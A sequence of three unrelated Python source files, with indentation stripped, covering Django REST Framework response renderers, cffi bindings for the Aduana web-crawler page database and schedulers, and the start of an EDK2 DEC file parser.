Renders `data` into serialized XML.
"""
if data is None:
return ''
stream = StringIO()
xml = SimplerXMLGenerator(stream, self.charset)
xml.startDocument()
xml.startElement("root", {})
self._to_xml(xml, data)
xml.endElement("root")
xml.endDocument()
return stream.getvalue()
def _to_xml(self, xml, data):
if isinstance(data, (list, tuple)):
for item in data:
xml.startElement("list-item", {})
self._to_xml(xml, item)
xml.endElement("list-item")
elif isinstance(data, dict):
for key, value in six.iteritems(data):
xml.startElement(key, {})
self._to_xml(xml, value)
xml.endElement(key)
elif data is None:
# Don't output any value
pass
else:
xml.characters(smart_text(data))
class YAMLRenderer(BaseRenderer):
"""
Renderer which serializes to YAML.
"""
media_type = 'application/yaml'
format = 'yaml'
encoder = encoders.SafeDumper
charset = 'utf-8'
ensure_ascii = False
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
Renders `data` into serialized YAML.
"""
assert yaml, 'YAMLRenderer requires pyyaml to be installed'
if data is None:
return ''
return yaml.dump(data, stream=None, encoding=self.charset, Dumper=self.encoder, allow_unicode=not self.ensure_ascii)
class TemplateHTMLRenderer(BaseRenderer):
"""
An HTML renderer for use with templates.
The data supplied to the Response object should be a dictionary that will
be used as context for the template.
The template name is determined by (in order of preference):
1. An explicit `.template_name` attribute set on the response.
2. An explicit `.template_name` attribute set on this class.
3. The return result of calling `view.get_template_names()`.
For example:
data = {'users': User.objects.all()}
return Response(data, template_name='users.html')
For pre-rendered HTML, see StaticHTMLRenderer.
"""
media_type = 'text/html'
format = 'html'
template_name = None
exception_template_names = [
'%(status_code)s.html',
'api_exception.html'
]
charset = 'utf-8'
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
Renders data to HTML, using Django's standard template rendering.
The template name is determined by (in order of preference):
1. An explicit .template_name set on the response.
2. An explicit .template_name set on this class.
3. The return result of calling view.get_template_names().
"""
renderer_context = renderer_context or {}
view = renderer_context['view']
request = renderer_context['request']
response = renderer_context['response']
if response.exception:
template = self.get_exception_template(response)
else:
template_names = self.get_template_names(response, view)
template = self.resolve_template(template_names)
context = self.resolve_context(data, request, response)
return template.render(context)
def resolve_template(self, template_names):
return loader.select_template(template_names)
def resolve_context(self, data, request, response):
if response.exception:
data['status_code'] = response.status_code
return RequestContext(request, data)
def get_template_names(self, response, view):
if response.template_name:
return [response.template_name]
elif self.template_name:
return [self.template_name]
elif hasattr(view, 'get_template_names'):
return view.get_template_names()
elif hasattr(view, 'template_name'):
return [view.template_name]
raise ImproperlyConfigured(
'Returned a template response with no `template_name` attribute set on either the view or response'
)
def get_exception_template(self, response):
template_names = [name % {'status_code': response.status_code}
for name in self.exception_template_names]
try:
# Try to find an appropriate error template
return self.resolve_template(template_names)
except Exception:
# Fall back to using eg '404 Not Found'
return Template('%d %s' % (response.status_code,
response.status_text.title()))
# Note, subclass TemplateHTMLRenderer simply for the exception behavior
class StaticHTMLRenderer(TemplateHTMLRenderer):
"""
An HTML renderer class that simply returns pre-rendered HTML.
The data supplied to the Response object should be a string representing
the pre-rendered HTML content.
For example:
data = '<html><body>example</body></html>'
return Response(data)
For template rendered HTML, see TemplateHTMLRenderer.
"""
media_type = 'text/html'
format = 'html'
charset = 'utf-8'
def render(self, data, accepted_media_type=None, renderer_context=None):
renderer_context = renderer_context or {}
response = renderer_context['response']
if response and response.exception:
request = renderer_context['request']
template = self.get_exception_template(response)
context = self.resolve_context(data, request, response)
return template.render(context)
return data
class HTMLFormRenderer(BaseRenderer):
"""
Renderers serializer data into an HTML form.
If the serializer was instantiated without an object then this will
return an HTML form not bound to any object,
otherwise it will return an HTML form with the appropriate initial data
populated from the object.
Note that rendering of field and form errors is not currently supported.
"""
media_type = 'text/html'
format = 'form'
charset = 'utf-8'
template_pack = 'rest_framework/horizontal/'
base_template = 'form.html'
default_style = ClassLookupDict({
serializers.Field: {
'base_template': 'input.html',
'input_type': 'text'
},
serializers.EmailField: {
'base_template': 'input.html',
'input_type': 'email'
},
serializers.URLField: {
'base_template': 'input.html',
'input_type': 'url'
},
serializers.IntegerField: {
'base_template': 'input.html',
'input_type': 'number'
},
serializers.DateTimeField: {
'base_template': 'input.html',
'input_type': 'datetime-local'
},
serializers.DateField: {
'base_template': 'input.html',
'input_type': 'date'
},
serializers.TimeField: {
'base_template': 'input.html',
'input_type': 'time'
},
serializers.FileField: {
'base_template': 'input.html',
'input_type': 'file'
},
serializers.BooleanField: {
'base_template': 'checkbox.html'
},
serializers.ChoiceField: {
'base_template': 'select.html', # Also valid: 'radio.html'
},
serializers.MultipleChoiceField: {
'base_template': 'select_multiple.html', # Also valid: 'checkbox_multiple.html'
},
serializers.RelatedField: {
'base_template': 'select.html', # Also valid: 'radio.html'
},
serializers.ManyRelatedField: {
'base_template': 'select_multiple.html', # Also valid: 'checkbox_multiple.html'
},
serializers.Serializer: {
'base_template': 'fieldset.html'
},
serializers.ListSerializer: {
'base_template': 'list_fieldset.html'
}
})
def render_field(self, field, parent_style):
if isinstance(field, serializers.HiddenField):
return ''
style = dict(self.default_style[field])
style.update(field.style)
if 'template_pack' not in style:
style['template_pack'] = parent_style.get('template_pack', self.template_pack)
style['renderer'] = self
if style.get('input_type') == 'datetime-local' and isinstance(field.value, six.text_type):
field.value = field.value.rstrip('Z')
if 'template' in style:
template_name = style['template']
else:
template_name = style['template_pack'].strip('/') + '/' + style['base_template']
template = loader.get_template(template_name)
context = Context({'field': field, 'style': style})
return template.render(context)
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
Render serializer data and return an HTML form, as a string.
"""
form = data.serializer
meta = getattr(form, 'Meta', None)
style = getattr(meta, 'style', {})
if 'template_pack' not in style:
style['template_pack'] = self.template_pack
if 'base_template' not in style:
style['base_template'] = self.base_template
style['renderer'] = self
# This API needs to be finessed and finalized for 3.1
if 'template' in renderer_context:
template_name = renderer_context['template']
elif 'template' in style:
template_name = style['template']
else:
template_name = style['template_pack'].strip('/') + '/' + style['base_template']
renderer_context = renderer_context or {}
request = renderer_context['request']
template = loader.get_template(template_name)
context = RequestContext(request, {
'form': form,
'style': style
})
return template.render(context)
class BrowsableAPIRenderer(BaseRenderer):
"""
HTML renderer used to self-document the API.
"""
media_type = 'text/html'
format = 'api'
template = 'rest_framework/api.html'
charset = 'utf-8'
form_renderer_class = HTMLFormRenderer
def get_default_renderer(self, view):
"""
Return an instance of the first valid renderer.
(Don't use another documenting renderer.)
"""
renderers = [renderer for renderer in view.renderer_classes
if not issubclass(renderer, BrowsableAPIRenderer)]
non_template_renderers = [renderer for renderer in renderers
if not hasattr(renderer, 'get_template_names')]
if not renderers:
return None
elif non_template_renderers:
return non_template_renderers[0]()
return renderers[0]()
def get_content(self, renderer, data,
accepted_media_type, renderer_context):
"""
Get the content as if it had been rendered by the default
non-documenting renderer.
"""
if not renderer:
return '[No renderers were found]'
renderer_context['indent'] = 4
content = renderer.render(data, accepted_media_type, renderer_context)
render_style = getattr(renderer, 'render_style', 'text')
assert render_style in ['text', 'binary'], 'Expected .render_style ' \
'"text" or "binary", but got "%s"' % render_style
if render_style == 'binary':
return '[%d bytes of binary content]' % len(content)
return content
def show_form_for_method(self, view, method, request, obj):
"""
Returns True if a form should be shown for this method.
"""
if method not in view.allowed_methods:
return # Not a valid method
if not api_settings.FORM_METHOD_OVERRIDE:
return # Cannot use form overloading
try:
view.check_permissions(request)
if obj is not None:
view.check_object_permissions(request, obj)
except exceptions.APIException:
return False # Doesn't have permissions
return True
def get_rendered_html_form(self, data, view, method, request):
"""
Return a string representing a rendered HTML form, possibly bound to
either the input or output data.
In the absence of the View having an associated form then return None.
"""
# See issue #2089 for refactoring this.
serializer = getattr(data, 'serializer', None)
if serializer and not getattr(serializer, 'many', False):
instance = getattr(serializer, 'instance', None)
if isinstance(instance, Page):
instance = None
else:
instance = None
# If this is valid serializer data, and the form is for the same
# HTTP method as was used in the request then use the existing
# serializer instance, rather than dynamically creating a new one.
if request.method == method and serializer is not None:
try:
kwargs = {'data': request.data}
except ParseError:
kwargs = {}
existing_serializer = serializer
else:
kwargs = {}
existing_serializer = None
with override_method(view, request, method) as request:
if not self.show_form_for_method(view, method, request, instance):
return
if method in ('DELETE', 'OPTIONS'):
return True # Don't actually need to return a form
if (
not getattr(view, 'get_serializer', None)
or not any(is_form_media_type(parser.media_type) for parser in view.parser_classes)
):
return
if existing_serializer is not None:
serializer = existing_serializer
else:
if method in ('PUT', 'PATCH'):
serializer = view.get_serializer(instance=instance, **kwargs)
else:
serializer = view.get_serializer(**kwargs)
if hasattr(serializer, 'initial_data'):
serializer.is_valid()
form_renderer = self.form_renderer_class()
return form_renderer.render(
serializer.data,
self.accepted_media_type,
dict(
list(self.renderer_context.items()) +
[('template', 'rest_framework/api_form.html')]
)
)
def get_raw_data_form(self, data, view, method, request):
"""
Returns a form that allows for arbitrary content types to be tunneled
via standard HTML forms.
(Which are typically application/x-www-form-urlencoded)
"""
# See issue #2089 for refactoring this.
serializer = getattr(data, 'serializer', None)
if serializer and not getattr(serializer, 'many', False):
instance = getattr(serializer, 'instance', None)
if isinstance(instance, Page):
instance = None
else:
instance = None
with override_method(view, request, method) as request:
# If we're not using content overloading there's no point in
# supplying a generic form, as the view won't treat the form's
# value as the content of the request.
if not (api_settings.FORM_CONTENT_OVERRIDE
and api_settings.FORM_CONTENTTYPE_OVERRIDE):
return None
# Check permissions
if not self.show_form_for_method(view, method, request, instance):
return
# If possible, serialize the initial content for the generic form
default_parser = view.parser_classes[0]
renderer_class = getattr(default_parser, 'renderer_class', None)
if (hasattr(view, 'get_serializer') and renderer_class):
# View has a serializer defined and parser class has a
# corresponding renderer that can be used to render the data.
if method in ('PUT', 'PATCH'):
serializer = view.get_serializer(instance=instance)
else:
serializer = view.get_serializer()
# Render the raw data content
renderer = renderer_class()
accepted = self.accepted_media_type
context = self.renderer_context.copy()
context['indent'] = 4
content = renderer.render(serializer.data, accepted, context)
else:
content = None
# Generate a generic form that includes a content type field,
# and a content field.
content_type_field = api_settings.FORM_CONTENTTYPE_OVERRIDE
content_field = api_settings.FORM_CONTENT_OVERRIDE
media_types = [parser.media_type for parser in view.parser_classes]
choices = [(media_type, media_type) for media_type in media_types]
initial = media_types[0]
# NB. http://jacobian.org/writing/dynamic-form-generation/
class GenericContentForm(forms.Form):
def __init__(self):
super(GenericContentForm, self).__init__()
self.fields[content_type_field] = forms.ChoiceField(
label='Media type',
choices=choices,
initial=initial
)
self.fields[content_field] = forms.CharField(
label='Content',
widget=forms.Textarea,
initial=content
)
return GenericContentForm()
def get_name(self, view):
return view.get_view_name()
def get_description(self, view):
return view.get_view_description(html=True)
def get_breadcrumbs(self, request):
return get_breadcrumbs(request.path)
def get_context(self, data, accepted_media_type, renderer_context):
"""
Returns the context used to render.
"""
view = renderer_context['view']
request = renderer_context['request']
response = renderer_context['response']
renderer = self.get_default_renderer(view)
raw_data_post_form = self.get_raw_data_form(data, view, 'POST', request)
raw_data_put_form = self.get_raw_data_form(data, view, 'PUT', request)
raw_data_patch_form = self.get_raw_data_form(data, view, 'PATCH', request)
raw_data_put_or_patch_form = raw_data_put_form or raw_data_patch_form
response_headers = dict(response.items())
renderer_content_type = ''
if renderer:
renderer_content_type = '%s' % renderer.media_type
if renderer.charset:
renderer_content_type += ' ;%s' % renderer.charset
response_headers['Content-Type'] = renderer_content_type
context = {
'content': self.get_content(renderer, data, accepted_media_type, renderer_context),
'view': view,
'request': request,
'response': response,
'description': self.get_description(view),
'name': self.get_name(view),
'version': VERSION,
'breadcrumblist': self.get_breadcrumbs(request),
'allowed_methods': view.allowed_methods,
'available_formats': [renderer_cls.format for renderer_cls in view.renderer_classes],
'response_headers': response_headers,
'put_form': self.get_rendered_html_form(data, view, 'PUT', request),
'post_form': self.get_rendered_html_form(data, view, 'POST', request),
'delete_form': self.get_rendered_html_form(data, view, 'DELETE', request),
'options_form': self.get_rendered_html_form(data, view, 'OPTIONS', request),
'raw_data_put_form': raw_data_put_form,
'raw_data_post_form': raw_data_post_form,
'raw_data_patch_form': raw_data_patch_form,
'raw_data_put_or_patch_form': raw_data_put_or_patch_form,
'display_edit_forms': bool(response.status_code != 403),
'api_settings': api_settings
}
return context
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
Render the HTML for the browsable API representation.
"""
self.accepted_media_type = accepted_media_type or ''
self.renderer_context = renderer_context or {}
template = loader.get_template(self.template)
context = self.get_context(data, accepted_media_type, renderer_context)
context = RequestContext(renderer_context['request'], context)
ret = template.render(context)
# Munge DELETE Response code to allow us to return content
# (Do this *after* we've rendered the template so that we include
# the normal deletion response code in the output)
response = renderer_context['response']
if response.status_code == status.HTTP_204_NO_CONTENT:
response.status_code = status.HTTP_200_OK
return ret
class MultiPartRenderer(BaseRenderer):
media_type = 'multipart/form-data; boundary=BoUnDaRyStRiNg'
format = 'multipart'
charset = 'utf-8'
BOUNDARY = 'BoUnDaRyStRiNg' if django.VERSION >= (1, 5) else b'BoUnDaRyStRiNg'
def render(self, data, accepted_media_type=None, renderer_context=None):
return encode_multipart(self.BOUNDARY, data)
| |
import warnings
import re
from _aduana import lib as C_ADUANA
from _aduana import ffi
########################################################################
# PageDB Wrappers
########################################################################
class PageDBException(Exception):
@classmethod
def from_error(cls, c_error):
return cls(
message = C_ADUANA.error_message(c_error),
code = C_ADUANA.error_code(c_error))
def __init__(self, message, code=None):
self.message = message
self.code = code
def __str__(self):
r = ffi.string(self.message)
if self.code:
r += " (code={0})".format(self.code)
return r
class CrawledPage(object):
def __init__(self, url, links=[]):
"""Parameters:
- url: a string
- links: a list where each element can be:
a. A link URL
b. A pair made from a link URL and a score between 0 and 1
If the first option is used then score is assumed 0.0
"""
# make sure we keep a reference to the module
self._c_aduana = C_ADUANA
self._crawled_page = self._c_aduana.crawled_page_new(url)
if not self._crawled_page:
raise PageDBException(
"Error inside crawled_page_new: returned NULL")
for pair in links:
if (isinstance(pair, basestring)):
url = pair
score = 0.0
else:
url = pair[0]
score = pair[1]
ret = self._c_aduana.crawled_page_add_link(
self._crawled_page,
url,
ffi.cast("float", score))
if ret != 0:
raise PageDBException(
"Error inside crawled_page_add_link: returned %d" % ret)
@property
def score(self):
return self._crawled_page.score
@score.setter
def score(self, value):
self._crawled_page.score = value
@property
def hash(self):
ret = None
phash = ffi.cast('uint64_t *', self._crawled_page.content_hash)
if phash:
ret = phash[0]
return ret
@hash.setter
def hash(self, value):
ret = self._c_aduana.crawled_page_set_hash64(
self._crawled_page, ffi.cast('uint64_t', value))
if ret != 0:
raise PageDBException(
"Error inside crawled_page_set_hash64: returned %d" % ret)
def get_links(self):
links = []
for i in xrange(self._c_aduana.crawled_page_n_links(self._crawled_page)):
pLi = self._c_aduana.crawled_page_get_link(self._crawled_page, i)
links.append((pLi[0].url, pLi[0].score))
return links
def __del__(self):
self._c_aduana.crawled_page_delete(self._crawled_page)
class PageInfo(object):
def __init__(self, page_hash, c_page_info):
self._c_aduana = C_ADUANA
self._page_info = c_page_info
self._hash = page_hash
@property
def url(self):
return ffi.string(self._page_info.url)
def __getattr__(self, name):
return getattr(self._page_info, name)
def __del__(self):
self._c_aduana.page_info_delete(self._page_info)
def __hash__(self):
return self._hash
@property
def rate(self):
return self._c_aduana.page_info_rate(self._page_info)
@property
def is_seed(self):
return self._c_aduana.page_info_is_seed(self._page_info)
class PageDB(object):
@staticmethod
def urlhash(url):
return C_ADUANA.page_db_hash(url)
def __init__(self, path, persist=0):
# save to make sure lib is available at destruction time
self._c_aduana = C_ADUANA
self._page_db = ffi.new('PageDB **')
ret = self._c_aduana.page_db_new(self._page_db, path)
if ret != 0:
if self._page_db:
raise PageDBException.from_error(self._page_db[0].error)
else:
raise PageDBException("Error inside page_db_new", ret)
self.persist = persist
@property
def persist(self):
return self._page_db[0].persist
@persist.setter
def persist(self, value):
self._c_aduana.page_db_set_persist(self._page_db[0], value)
def __del__(self):
self._c_aduana.page_db_delete(self._page_db[0])
def iter_page_info(self):
st = ffi.new('HashInfoStream **')
ret = self._c_aduana.hashinfo_stream_new(st, self._page_db[0])
if ret != 0:
raise PageDBException.from_error(self._page_db[0].error)
page_hash = ffi.new('uint64_t *')
pi = ffi.new('PageInfo **')
while True:
ss = self._c_aduana.hashinfo_stream_next(st[0], page_hash, pi)
if ss != self._c_aduana.stream_state_next:
break
yield PageInfo(page_hash[0], pi[0])
self._c_aduana.hashinfo_stream_delete(st[0])
def page_info(self, page_hash):
pi = ffi.new('PageInfo **')
ret = self._c_aduana.page_db_get_info(
self._page_db[0], ffi.cast('uint64_t', page_hash), pi)
if ret != 0:
raise PageDBException.from_error(self._page_db[0].error)
return PageInfo(page_hash, pi[0])
########################################################################
# Scorers
########################################################################
class PageRankScorer(object):
def __init__(self, page_db):
self._c_aduana = C_ADUANA
self._scorer = ffi.new('PageRankScorer **')
self._c_aduana.page_rank_scorer_new(self._scorer, page_db._page_db[0])
def __del__(self):
self._c_aduana.page_rank_scorer_delete(self._scorer[0])
def setup(self, scorer):
self._c_aduana.page_rank_scorer_setup(self._scorer[0], scorer)
@property
def persist(self):
return self._scorer[0].persist
@persist.setter
def persist(self, value):
self._c_aduana.page_rank_scorer_set_persist(self._scorer[0], value)
@property
def use_content_scores(self):
return self._scorer[0].use_content_scores
@use_content_scores.setter
def use_content_scores(self, value):
self._c_aduana.page_rank_scorer_set_use_content_scores(
self._scorer[0], 1 if value else 0)
@property
def damping(self):
return self._scorer[0].page_rank.damping
@damping.setter
def damping(self, value):
self._c_aduana.page_rank_scorer_set_damping(self._scorer[0], value)
class HitsScorer(object):
def __init__(self, page_db):
self._c_aduana = C_ADUANA
self._scorer = ffi.new('HitsScorer **')
self._c_aduana.hits_scorer_new(self._scorer, page_db._page_db[0])
def __del__(self):
self._c_aduana.hits_scorer_delete(self._scorer[0])
def setup(self, scorer):
self._c_aduana.hits_scorer_setup(self._scorer[0], scorer)
@property
def persist(self):
return self._scorer[0].persist
@persist.setter
def persist(self, value):
self._c_aduana.hits_scorer_set_persist(self._scorer[0], value)
@property
def use_content_scores(self):
return self._scorer[0].use_content_scores
@use_content_scores.setter
def use_content_scores(self, value):
self._c_aduana.hits_scorer_set_use_content_scores(
self._scorer[0], 1 if value else 0)
########################################################################
# Scheduler Wrappers
########################################################################
class SchedulerCore(object):
def __init__(self, scheduler, scheduler_add, scheduler_request):
self._c_aduana = C_ADUANA
self._sch = scheduler
self._scheduler_add = scheduler_add
self._scheduler_request = scheduler_request
def add(self, crawled_page):
# better to signal this as an error here than in bf_scheduler_add
if not isinstance(crawled_page, CrawledPage):
raise PageDBException("argument to function must be a CrawledPage instance")
ret = self._scheduler_add(self._sch[0], crawled_page._crawled_page)
if ret != 0:
raise PageDBException.from_error(self._sch[0].error)
def requests(self, n_pages):
pReq = ffi.new('PageRequest **')
ret = self._scheduler_request(self._sch[0], n_pages, pReq)
if ret != 0:
raise PageDBException.from_error(self._sch[0].error)
reqs = [ffi.string(pReq[0].urls[i]) for i in xrange(pReq[0].n_urls)]
self._c_aduana.page_request_delete(pReq[0])
return reqs
class BFScheduler(object):
def __init__(self, page_db, persist=0, scorer=None, path=None):
# save to make sure lib is available at destruction time
self._c_aduana = C_ADUANA
self._page_db = page_db
self._page_db.persist = persist
self._sch = ffi.new('BFScheduler **')
self._core = SchedulerCore(
self._sch,
self._c_aduana.bf_scheduler_add,
self._c_aduana.bf_scheduler_request
)
ret = self._c_aduana.bf_scheduler_new(
self._sch,
self._page_db._page_db[0],
path or ffi.NULL
)
if ret != 0:
if self._sch:
raise PageDBException.from_error(self._sch[0].error)
else:
raise PageDBException("Error inside bf_scheduler_new", ret)
self._c_aduana.bf_scheduler_set_persist(self._sch[0], persist)
if scorer:
self._scorer = scorer
self._scorer.setup(self._sch[0].scorer)
ret = self._c_aduana.bf_scheduler_update_start(self._sch[0])
if ret != 0:
raise PageDBException.from_error(self._sch[0].error)
def __del__(self):
ret = self._c_aduana.bf_scheduler_update_stop(self._sch[0])
if ret != 0:
raise PageDBException.from_error(self._sch[0].error)
self._c_aduana.bf_scheduler_delete(self._sch[0])
@classmethod
def from_settings(cls, page_db, settings, logger=None):
scorer_class = settings.get('SCORER', False)
if scorer_class is None:
if logger:
logger.backend.warning(
'No SCORER setting. Using default content scorer')
scorer = None
else:
scorer = scorer_class(page_db)
use_scores = settings.get('USE_SCORES', False)
if use_scores:
if scorer_class == PageRankScorer:
scorer.damping = settings.get('PAGE_RANK_DAMPING', 0.85)
scorer.use_content_scores = use_scores
scheduler = cls(page_db, scorer=scorer, persist=page_db.persist)
soft_crawl_limit = settings.get('SOFT_CRAWL_LIMIT', 0.25)
hard_crawl_limit = settings.get('HARD_CRAWL_LIMIT', 100.0)
scheduler.set_crawl_rate(soft_crawl_limit, hard_crawl_limit)
max_crawl_depth = settings.get('MAX_CRAWL_DEPTH', None)
if max_crawl_depth:
scheduler.set_max_crawl_depth(max_crawl_depth)
update_interval = settings.get('SCORE_UPDATE_INTERVAL', None)
if update_interval:
scheduler.set_update_interval(update_interval)
return scheduler
def add(self, crawled_page):
return self._core.add(crawled_page)
def requests(self, n_pages):
return self._core.requests(n_pages)
def set_crawl_rate(self, soft_rate, hard_rate):
self._c_aduana.bf_scheduler_set_max_domain_crawl_rate(self._sch[0], soft_rate, hard_rate)
def set_max_crawl_depth(self, max_crawl_depth=0):
self._c_aduana.bf_scheduler_set_max_crawl_depth(self._sch[0], max_crawl_depth)
def set_update_interval(self, update_interval):
self._c_aduana.bf_scheduler_set_update_interval(self._sch[0], update_interval)
class FreqScheduler(object):
def __init__(self, page_db, persist=0, path=None):
# save to make sure lib is available at destruction time
self._c_aduana = C_ADUANA
self._page_db = page_db
self._page_db.persist = persist
self._sch = ffi.new('FreqScheduler **')
self._core = SchedulerCore(
self._sch,
self._c_aduana.freq_scheduler_add,
self._c_aduana.freq_scheduler_request
)
ret = self._c_aduana.freq_scheduler_new(
self._sch,
self._page_db._page_db[0],
path or ffi.NULL
)
if ret != 0:
if self._sch:
raise PageDBException.from_error(self._sch[0].error)
else:
raise PageDBException("Error inside freq_scheduler_new", ret)
self._sch[0].persist = persist
@classmethod
def from_settings(cls, page_db, settings, logger=None):
scheduler = cls(page_db, persist=page_db.persist)
max_n_crawls = settings.get('MAX_N_CRAWLS', None)
if max_n_crawls:
scheduler.max_n_crawls = max_n_crawls
freq_default = settings.get('FREQ_DEFAULT', 0.1)
freq_scale = settings.get('FREQ_SCALE', -1.0)
scheduler.load_simple(freq_default, freq_scale)
freq_margin = settings.get('FREQ_MARGIN', -1.0)
scheduler.margin = freq_margin
return scheduler
def load_simple(self, freq_default=1.0, freq_scale=None):
self._c_aduana.freq_scheduler_load_simple(
self._sch[0], freq_default, freq_scale or -1.0)
def load(self, freq_iter):
cur = ffi.new('void **')
ret = self._c_aduana.freq_scheduler_cursor_open(self._sch[0], cur)
if ret != 0:
raise PageDBException.from_error(self._sch[0].error)
for page_hash, page_freq in freq_iter:
self._c_aduana.freq_scheduler_cursor_write(
self._sch[0],
cur[0],
ffi.cast('uint64_t', page_hash),
page_freq
)
ret = self._c_aduana.freq_scheduler_cursor_commit(self._sch[0], cur[0])
if ret != 0:
raise PageDBException.from_error(self._sch[0].error)
def add(self, crawled_page):
return self._core.add(crawled_page)
def requests(self, n_pages):
return self._core.requests(n_pages)
def __del__(self):
self._c_aduana.freq_scheduler_delete(self._sch[0])
@property
def max_n_crawls(self):
return self._sch[0].max_n_crawls
@max_n_crawls.setter
def max_n_crawls(self, value):
self._sch[0].max_n_crawls = value
@property
def margin(self):
return self._sch[0].margin
@margin.setter
def margin(self, value):
self._sch[0].margin = value
def freq_spec(page_db, path):
rules = []
with open(path, 'r') as spec:
for line in spec:
cols = line.split()
if len(cols) == 2:
rules.append(
(re.compile(cols[0]), cols[1]))
for page_info in page_db.iter_page_info():
for regexp, action in rules:
if regexp.match(page_info.url):
if action[0] == 'x':
try:
mult = float(action[1:])
except ValueError:
warning.warn("Could not parse multiplier: ", action)
yield hash(page_info), mult*page_info.rate
break # stop after we find a rule
else:
try:
interval = float(action)
except ValueError:
warning.warn("Could not parse interval: ", action)
yield hash(page_info), 1.0/interval
break
if __name__ == '__main__':
db = PageDB('./test_python_bindings')
scorer = PageRankScorer(db)
bf = BFScheduler(db, scorer=scorer)
for i in xrange(100000):
cp = CrawledPage(str(i), [str(i + j) for j in xrange(10)])
bf.add(cp)
| |
## @file
# This file is used to parse DEC file. It will consumed by DecParser
#
# Copyright (c) 2011 - 2018, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials are licensed and made available
# under the terms and conditions of the BSD License which accompanies this
# distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
'''
DecParser
'''
## Import modules
#
import Logger.Log as Logger
from Logger.ToolError import FILE_PARSE_FAILURE
from Logger.ToolError import FILE_OPEN_FAILURE
from Logger import StringTable as ST
from Logger.ToolError import FORMAT_INVALID
import Library.DataType as DT
from Library.ParserValidate import IsValidToken
from Library.ParserValidate import IsValidPath
from Library.ParserValidate import IsValidCFormatGuid
from Library.ParserValidate import IsValidIdString
from Library.ParserValidate import IsValidUserId
from Library.ParserValidate import IsValidArch
from Library.ParserValidate import IsValidWord
from Library.ParserValidate import IsValidDecVersionVal
from Parser.DecParserMisc import TOOL_NAME
from Parser.DecParserMisc import CleanString
from Parser.DecParserMisc import IsValidPcdDatum
from Parser.DecParserMisc import ParserHelper
from Parser.DecParserMisc import StripRoot
from Parser.DecParserMisc import VERSION_PATTERN
from Parser.DecParserMisc import CVAR_PATTERN
from Parser.DecParserMisc import PCD_TOKEN_PATTERN
from Parser.DecParserMisc import MACRO_PATTERN
from Parser.DecParserMisc import FileContent
from Object.Parser.DecObject import _DecComments
from Object.Parser.DecObject import DecDefineObject
from Object.Parser.DecObject import DecDefineItemObject
from Object.Parser.DecObject import DecIncludeObject
from Object.Parser.DecObject import DecIncludeItemObject
from Object.Parser.DecObject import DecLibraryclassObject
from Object.Parser.DecObject import DecLibraryclassItemObject
from Object.Parser.DecObject import DecGuidObject
from Object.Parser.DecObject import DecPpiObject
from Object.Parser.DecObject import DecProtocolObject
from Object.Parser.DecObject import DecGuidItemObject
from Object.Parser.DecObject import DecUserExtensionObject
from Object.Parser.DecObject import DecUserExtensionItemObject
from Object.Parser.DecObject import DecPcdObject
from Object.Parser.DecObject import DecPcdItemObject
from Library.Misc import GuidStructureStringToGuidString
from Library.Misc import CheckGuidRegFormat
from Library.StringUtils import ReplaceMacro
from Library.StringUtils import GetSplitValueList
from Library.StringUtils import gMACRO_PATTERN
from Library.StringUtils import ConvertSpecialChar
from Library.CommentParsing import ParsePcdErrorCode
##
# _DecBase class for parsing
#
class _DecBase:
def __init__(self, RawData):
self._RawData = RawData
self._ItemDict = {}
self._LocalMacro = {}
#
# Data parsed by 'self' are saved to this object
#
self.ItemObject = None
def GetDataObject(self):
return self.ItemObject
def GetLocalMacro(self):
return self._LocalMacro
## BlockStart
#
# Called if a new section starts
#
def BlockStart(self):
self._LocalMacro = {}
## _CheckReDefine
#
# @param Key: to be checked if multi-defined
# @param Scope: Format: [[SectionName, Arch], ...].
# If scope is none, use global scope
#
def _CheckReDefine(self, Key, Scope = None):
if not Scope:
Scope = self._RawData.CurrentScope
return
SecArch = []
#
# Copy scope to SecArch, avoid Scope be changed outside
#
SecArch[0:1] = Scope[:]
if Key not in self._ItemDict:
self._ItemDict[Key] = [[SecArch, self._RawData.LineIndex]]
return
for Value in self._ItemDict[Key]:
for SubValue in Scope:
#
# If current is common section
#
if SubValue[-1] == 'COMMON':
for Other in Value[0]:
# Key in common cannot be redefined in other arches
# [:-1] means stripping arch info
if Other[:-1] == SubValue[:-1]:
self._LoggerError(ST.ERR_DECPARSE_REDEFINE % (Key, Value[1]))
return
continue
CommonScope = []
CommonScope[0:1] = SubValue
CommonScope[-1] = 'COMMON'
#
# Cannot be redefined if this key already defined in COMMON Or defined in same arch
#
if SubValue in Value[0] or CommonScope in Value[0]:
self._LoggerError(ST.ERR_DECPARSE_REDEFINE % (Key, Value[1]))
return
self._ItemDict[Key].append([SecArch, self._RawData.LineIndex])
## CheckRequiredFields
# Some sections need to check if some fields exist, define section for example
# Derived class can re-implement, top parser will call this function after all parsing done
#
def CheckRequiredFields(self):
if self._RawData:
pass
return True
## IsItemRequired
# In DEC spec, sections must have at least one statement except user
# extension.
# For example: "[guids" [<attribs>] "]" <EOL> <statements>+
# sub class can override this method to indicate if statement is a must.
#
def _IsStatementRequired(self):
if self._RawData:
pass
return False
def _LoggerError(self, ErrorString):
Logger.Error(TOOL_NAME, FILE_PARSE_FAILURE, File=self._RawData.Filename,
Line = self._RawData.LineIndex,
ExtraData=ErrorString + ST.ERR_DECPARSE_LINE % self._RawData.CurrentLine)
def _ReplaceMacro(self, String):
if gMACRO_PATTERN.findall(String):
String = ReplaceMacro(String, self._LocalMacro, False,
FileName = self._RawData.Filename,
Line = ['', self._RawData.LineIndex])
String = ReplaceMacro(String, self._RawData.Macros, False,
FileName = self._RawData.Filename,
Line = ['', self._RawData.LineIndex])
MacroUsed = gMACRO_PATTERN.findall(String)
if MacroUsed:
Logger.Error(TOOL_NAME, FILE_PARSE_FAILURE,
File=self._RawData.Filename,
Line = self._RawData.LineIndex,
ExtraData = ST.ERR_DECPARSE_MACRO_RESOLVE % (str(MacroUsed), String))
return String
def _MacroParser(self, String):
TokenList = GetSplitValueList(String, ' ', 1)
if len(TokenList) < 2 or TokenList[1] == '':
self._LoggerError(ST.ERR_DECPARSE_MACRO_PAIR)
TokenList = GetSplitValueList(TokenList[1], DT.TAB_EQUAL_SPLIT, 1)
